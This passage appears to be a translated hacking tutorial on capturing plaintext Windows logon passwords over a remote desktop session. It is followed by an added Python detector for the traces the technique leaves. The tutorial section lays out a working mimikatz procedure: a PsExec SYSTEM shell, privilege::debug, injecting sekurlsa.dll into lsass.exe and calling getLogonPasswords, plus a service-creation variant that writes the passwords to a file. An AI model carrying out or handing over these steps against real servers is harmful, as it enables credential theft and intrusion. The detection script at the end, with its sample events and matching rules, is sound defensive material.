On a remote terminal (3389, mstsc.exe) or a virtual desktop, you can capture the password. Generally, when you run this program in a remote terminal session, the following message is displayed: the storage space is insufficient and the command cannot be processed. This is because in terminal mode a remote thread cannot be inserted: injection does not work across sessions. You need to execute the program using the following method.

First, extract the files. To capture only the password, only these files are required:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

Package them, upload the package to the target server, and decompress it. Note that the path cannot contain Chinese characters (spaces are allowed)! Otherwise, an error will be reported during DLL loading: the file cannot be found.

Then, use either of the following methods to capture the password:

// The simplest and most practical method: start with PsExec.exe.
// Run cmd.exe under the SYSTEM account, or run mimikatz.exe directly
psexec -s cmd.exe
// start mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
// elevate privileges
privilege::debug
// inject the DLL. Use the absolute path! The path cannot contain Chinese characters (spaces are allowed)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
// capture the password
@getLogonPasswords
// exit; do not use Ctrl+C, it causes mimikatz.exe to reach 100% CPU usage in an endless loop
exit

// use At to start ***

// service creation method
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword

// telnet a remote command pipeline
telnet ****
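A defender-side check for the artifacts this procedure leaves, as an added example that is not part of the original page: it flags a service whose command line wraps cmd /c with redirected I/O, a remote thread created in lsass.exe, and a DLL loaded into lsass.exe from outside System32. The events are constructed samples, and the field names assume Windows event 7045 and Sysmon events 7 and 8 already parsed into dicts.

```python
import re

# Constructed sample events (already parsed into dicts, e.g. from a JSON export).
# Field names follow Windows event 7045 (service installed) and Sysmon events
# 7 (image loaded) and 8 (CreateRemoteThread); the values are made up.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "getpassword",
     "ImagePath": r"cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 8, "SourceImage": r"C:\mimikatz_trunk\Win32\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 7, "Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\mimikatz_trunk\Win32\sekurlsa.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\kerberos.dll"},
]

SYSTEM_DIR = "c:\\windows\\system32\\"
# A service binary path that is really "cmd /c ..." with < or > redirection.
SHELL_WRAPPER = re.compile(r"\bcmd(\.exe)?\s*/c\b.*[<>]", re.IGNORECASE)

def is_lsass(path):
    return path.lower().endswith("\\lsass.exe")

def classify(event):
    """Return a finding string for a suspicious event, or None."""
    eid = event.get("EventID")
    if eid == 7045 and SHELL_WRAPPER.search(event.get("ImagePath", "")):
        return "service runs cmd /c with redirected I/O: " + event.get("ServiceName", "?")
    if eid == 8 and is_lsass(event.get("TargetImage", "")):
        return "remote thread created in lsass.exe by " + event.get("SourceImage", "?")
    if eid == 7 and is_lsass(event.get("Image", "")):
        loaded = event.get("ImageLoaded", "")
        if not loaded.lower().startswith(SYSTEM_DIR):
            return "non-system DLL loaded into lsass.exe: " + loaded
    return None

def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in map(classify, events) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rules match on behaviour rather than on the service name or tool path, since both are trivially renamed.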